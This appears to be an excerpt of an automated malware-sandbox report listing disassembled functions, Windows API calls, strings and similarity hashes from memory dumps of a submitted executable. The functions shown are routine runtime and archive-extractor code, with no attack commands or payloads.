API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 5ad35197d5e39fb0efe971aacc45e5bc3dd79a74048017fb0cd39376badfdf14
Instruction ID: 354a029ef17a68dc2612d325d8edb345d41d86bfda051807723425f9c44b86aa
Opcode Fuzzy Hash: 5ad35197d5e39fb0efe971aacc45e5bc3dd79a74048017fb0cd39376badfdf14
Instruction Fuzzy Hash: 74E0DFB8A007029ECB209F74980CB027BD56F04714B08C82EE2CA93240CAB8D140AB22

Function 00FC2BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00FC2CA1
___AdjustPointer.LIBCMT ref: 00FC2CC4
_abort.LIBCMT ref: 00FC2D12
___AdjustPointer.LIBCMT ref: 00FC2D60

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: 863c72c4e4af84c18aa2fc080df0bbb8cf1632aa9b437eb0952ebf0b0d5742c8
Instruction ID: 5451de17f59e0acf918b99e76a44415a3f673a47eb295e93146cb1f5100f0c19
Opcode Fuzzy Hash: 863c72c4e4af84c18aa2fc080df0bbb8cf1632aa9b437eb0952ebf0b0d5742c8
Instruction Fuzzy Hash: 0251BF72A00213AFDB698F14DA47FAA73A4FF64320F24412DE802576A1DB35ED41F790

Function 00FCBF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00FCBF39
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FCBF5C

Part of subcall function 00FC8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00FCCA2C,00000000,?,00FC6CBE,?,00000008,?,00FC91E0,?,?,?), ref: 00FC8E38

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00FCBF82
_free.LIBCMT ref: 00FCBF95
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00FCBFA4

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: f2850771b539b813642150c2abbb093fa9c1315a0f50df64777b8b1be43071ca
Instruction ID: fc552818d5ac17b3ebf74501cb74e54b5f1d13d13e95cf72544e7de7d2ee0696
Opcode Fuzzy Hash: f2850771b539b813642150c2abbb093fa9c1315a0f50df64777b8b1be43071ca
Instruction Fuzzy Hash: A501B17AE022177F232116BA5D4BE7B7B6DDEC2BA1714012EFA04C2204EF608D02F5B1

Function 00FC9869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00FC91AD,00FCB188,?,00FC9813,00000001,00000364,?,00FC3F73,00000050,?,00FE1030,00000200), ref: 00FC986E
_free.LIBCMT ref: 00FC98A3
_free.LIBCMT ref: 00FC98CA
SetLastError.KERNEL32(00000000,?,00FE1030,00000200), ref: 00FC98D7
SetLastError.KERNEL32(00000000,?,00FE1030,00000200), ref: 00FC98E0

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 6e0b5d45a2956022c7bd0a28eaaf04b1e8518bc0b8d6c5d305496349bf663ad7
Instruction ID: 4e75122f65ee413d5b18bb2848aaf5bab67fd54b4267332f5edee854f0ac56fa
Opcode Fuzzy Hash: 6e0b5d45a2956022c7bd0a28eaaf04b1e8518bc0b8d6c5d305496349bf663ad7
Instruction Fuzzy Hash: 7201213750A6076B83122339AF8FF1A362ADBC2774761013EF611931D2EEA48C067265

Function 00FB0EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00FB11CF: ResetEvent.KERNEL32(?), ref: 00FB11E1
Part of subcall function 00FB11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00FB11F5

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00FB0F21
CloseHandle.KERNEL32(?,?), ref: 00FB0F3B
DeleteCriticalSection.KERNEL32(?), ref: 00FB0F54
CloseHandle.KERNEL32(?), ref: 00FB0F60
CloseHandle.KERNEL32(?), ref: 00FB0F6C

Part of subcall function 00FB0FE4: WaitForSingleObject.KERNEL32(?,000000FF,00FB1206,?), ref: 00FB0FEA
Part of subcall function 00FB0FE4: GetLastError.KERNEL32(?), ref: 00FB0FF6

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: 304b0fc1e51f998761698d0b6f3138bbfeca07acaf81d7d4f4ebbb37e2f0b6ac
Instruction ID: a11a7e8cc60a8f40ab58c3497304f83047dac368a1f30d9640bdf49f4f51d11c
Opcode Fuzzy Hash: 304b0fc1e51f998761698d0b6f3138bbfeca07acaf81d7d4f4ebbb37e2f0b6ac
Instruction Fuzzy Hash: BE017172501744EFC7229B75DC88BC6FBAAFB08714F00092AF26B92560CB757A45EB91

Function 00FCC7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00FCC817

Part of subcall function 00FC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00FCC896,?,00000000,?,00000000,?,00FCC8BD,?,00000007,?,?,00FCCCBA,?), ref: 00FC8DE2
Part of subcall function 00FC8DCC: GetLastError.KERNEL32(?,?,00FCC896,?,00000000,?,00000000,?,00FCC8BD,?,00000007,?,?,00FCCCBA,?,?), ref: 00FC8DF4

_free.LIBCMT ref: 00FCC829
_free.LIBCMT ref: 00FCC83B
_free.LIBCMT ref: 00FCC84D
_free.LIBCMT ref: 00FCC85F

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 63e7195baf277fea71eaf1da59797a5805a51eb6f52c075b3c1748da963d207a
Instruction ID: 7bd3da4a1415c6fc96145aedbc2365eca424ec1ac0705247ef8a62c49dfd7a7c
Opcode Fuzzy Hash: 63e7195baf277fea71eaf1da59797a5805a51eb6f52c075b3c1748da963d207a
Instruction Fuzzy Hash: F2F06832901106ABC610EB78FA87E0773EAAA00760756081EF14DDB5D1CB74FC41E790

Function 00FB1FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00FB1FE5
_wcslen.LIBCMT ref: 00FB1FF6
_wcslen.LIBCMT ref: 00FB2006
_wcslen.LIBCMT ref: 00FB2014
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00FAB371,?,?,00000000,?,?,?), ref: 00FB202F

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: _wcslen$CompareString
String ID:
API String ID: 3397213944-0
Opcode ID: c0be9d8d3b13b72cd0a5397612c0c771fae3504d9db72c94eb8f81e78c072d95
Instruction ID: 016f43e089ec16843e01084e2303f551df33764c8deb7918ee2f2e6260d2b10e
Opcode Fuzzy Hash: c0be9d8d3b13b72cd0a5397612c0c771fae3504d9db72c94eb8f81e78c072d95
Instruction Fuzzy Hash: 66F01D33008019BBCF226F51EC0AECA7F26EB447A0B11C419F61A5B062CB729665EB90

Function 00FC8900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00FC891E

Part of subcall function 00FC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00FCC896,?,00000000,?,00000000,?,00FCC8BD,?,00000007,?,?,00FCCCBA,?), ref: 00FC8DE2
Part of subcall function 00FC8DCC: GetLastError.KERNEL32(?,?,00FCC896,?,00000000,?,00000000,?,00FCC8BD,?,00000007,?,?,00FCCCBA,?,?), ref: 00FC8DF4

_free.LIBCMT ref: 00FC8930
_free.LIBCMT ref: 00FC8943
_free.LIBCMT ref: 00FC8954
_free.LIBCMT ref: 00FC8965

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b4f41a257605cc32aa779229b32444452091e019f8e5f77c746d2ce0863cbe0e
Instruction ID: 42149c86102f422074d2c5cb9e61e029b10cb0798609926d5967f396abdaa5f9
Opcode Fuzzy Hash: b4f41a257605cc32aa779229b32444452091e019f8e5f77c746d2ce0863cbe0e
Instruction Fuzzy Hash: 5DF03A759121279BC6277F28FE079053BA2F728760B02050AF055562AACF3E4943FB81

Function 00FB15FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00FB17BC
_swprintf.LIBCMT ref: 00FB186B

Strings

%s: %s, xrefs: 00FB17CB
%ls, xrefs: 00FB1641, 00FB1657

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: e7fe27699327b3296192e4f2f13419bc6c88e029c8017acd93814143fd274069
Instruction ID: 5caf55ce9d4c9b0a0544d76ff7db337fb486709a6fd7cb8a04a06a0148baf851
Opcode Fuzzy Hash: e7fe27699327b3296192e4f2f13419bc6c88e029c8017acd93814143fd274069
Instruction Fuzzy Hash: 86513837288300F6F7211A928C66FF67366BB06B04FB44916F796650E1C9A7E410BF1B

Function 00FC7F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\YGk3y6Tdix.exe,00000104), ref: 00FC7FAE
_free.LIBCMT ref: 00FC8079
_free.LIBCMT ref: 00FC8083

Strings

C:\Users\user\Desktop\YGk3y6Tdix.exe, xrefs: 00FC7FA5, 00FC7FAC, 00FC7FDB, 00FC8013

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\YGk3y6Tdix.exe
API String ID: 2506810119-1997765088
Opcode ID: fd1798abc8782d9ef338f26c2a7fd43432e7d2442bab494e55e72b5580e2d7b4
Instruction ID: cff47a55febc15c659a0d13b5a2c1ac24a1e1b534143c70c8a3de237ca2e2f52
Opcode Fuzzy Hash: fd1798abc8782d9ef338f26c2a7fd43432e7d2442bab494e55e72b5580e2d7b4
Instruction Fuzzy Hash: 3F31C271E4021AAFCB21DF98DE86E9EBBBCEB84350F10406EF40497200DB758E46EB51

Function 00FC31D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00FC31FB
_abort.LIBCMT ref: 00FC3306

Strings

MOC, xrefs: 00FC320D
RCC, xrefs: 00FC3215

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: bb02967f6487e55b8ecd535e45f0ea5dd68cef6d19e20abea399bc05848140ab
Instruction ID: cdb196b1ec2d926e0d2cd8c045ab31706c6e69ac63981eb6dc0cb9c1578b49c7
Opcode Fuzzy Hash: bb02967f6487e55b8ecd535e45f0ea5dd68cef6d19e20abea399bc05848140ab
Instruction Fuzzy Hash: 41414672D0020AAFCF15DF98CE82FEEBBB5AF08354F198059F905A6211D735AA50EB50

Function 00FA7401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FA7406

Part of subcall function 00FA3BBA: __EH_prolog.LIBCMT ref: 00FA3BBF

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00FA74CD

Part of subcall function 00FA7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00FA7AAB
Part of subcall function 00FA7A9C: GetLastError.KERNEL32 ref: 00FA7AF1
Part of subcall function 00FA7A9C: CloseHandle.KERNEL32(?), ref: 00FA7B00

Strings

SeSecurityPrivilege, xrefs: 00FA744B
SeRestorePrivilege, xrefs: 00FA7460

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 7250ade22076dba811762b5deeed81d49b420253d8d0efe05148cf3cc79b4b68
Instruction ID: 01719ef14776d273e227d57717f5de96e28da53adefe708b1f05aadfe9597baa
Opcode Fuzzy Hash: 7250ade22076dba811762b5deeed81d49b420253d8d0efe05148cf3cc79b4b68
Instruction Fuzzy Hash: 3831C3F1D04348AEDF11EBA4DC45FEE7BA9BF4A350F084015F905A7282CB789A44EB61

Function 00FBAD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00FA1316: GetDlgItem.USER32(00000000,00003021), ref: 00FA135A
Part of subcall function 00FA1316: SetWindowTextW.USER32(00000000,00FD35F4), ref: 00FA1370

EndDialog.USER32(?,00000001), ref: 00FBAD98
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00FBADAD
SetDlgItemTextW.USER32(?,00000066,?), ref: 00FBADC2

Strings

ASKNEXTVOL, xrefs: 00FBAD28

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 250b32da2c60224409a8779b88daa2db07befe94fc978b6a693c41e3474f0517
Instruction ID: 2dd2acccc4d5c5f830ace1889ec49326c8fbac0282a42b09ea19a2bad3e2c921
Opcode Fuzzy Hash: 250b32da2c60224409a8779b88daa2db07befe94fc978b6a693c41e3474f0517
Instruction Fuzzy Hash: E9119332644200BFD7229F69DC45FEA776DEF4F752F400410F281DB594C766D805AB22

Function 00FAD8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 00FAD954
_strncpy.LIBCMT ref: 00FAD99A

Part of subcall function 00FB1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00FE1030,00000200,00FAD928,00000000,?,00000050,00FE1030), ref: 00FB1DC4

Strings

$%s, xrefs: 00FAD949
@%s, xrefs: 00FAD93E

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: f468888c1ff74768b751bcd0d887835978e6808c2e9b046f574a3f82a56375d3
Instruction ID: cf0caeb0b3de44bd009c128498cec9af6c875a7c44d0007227e7ba2d76a9b12e
Opcode Fuzzy Hash: f468888c1ff74768b751bcd0d887835978e6808c2e9b046f574a3f82a56375d3
Instruction Fuzzy Hash: 6E21BBB294024CAEDF20EEA4CD05FDF7BACAF0A700F040516F911965A2E775D645EF52

Function 00FB0E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00FAAC5A,00000008,?,00000000,?,00FAD22D,?,00000000), ref: 00FB0E85
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00FAAC5A,00000008,?,00000000,?,00FAD22D,?,00000000), ref: 00FB0E8F
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00FAAC5A,00000008,?,00000000,?,00FAD22D,?,00000000), ref: 00FB0E9F

Strings

Thread pool initialization failed., xrefs: 00FB0EB7

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 40e2a5e6e4409e131c3f2490b2103ee637dfbf20734855705774df446176f627
Instruction ID: e83b454bd1bc7d5d956d824f0091490007aeae37031d4b924ab665522a6c3bd1
Opcode Fuzzy Hash: 40e2a5e6e4409e131c3f2490b2103ee637dfbf20734855705774df446176f627
Instruction Fuzzy Hash: EE1151B1A447089FC3215F7A9C849A7FBECEB55754F14482EF1DAC3200DA719940AB50

Function 00FBB270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 00FA1316: GetDlgItem.USER32(00000000,00003021), ref: 00FA135A
Part of subcall function 00FA1316: SetWindowTextW.USER32(00000000,00FD35F4), ref: 00FA1370

EndDialog.USER32(?,00000001), ref: 00FBB2BE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00FBB2D6
SetDlgItemTextW.USER32(?,00000067,?), ref: 00FBB304

Strings

GETPASSWORD1, xrefs: 00FBB289

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: b7f91e8c564bfa304e8e3fb5d4ff7aac1a0143a8d7ce3df475c0a5e75a2bea23
Instruction ID: 86800e0a5a27a00538380c4ac22e6d704b5c381606aa4dfdfed205725e08d907
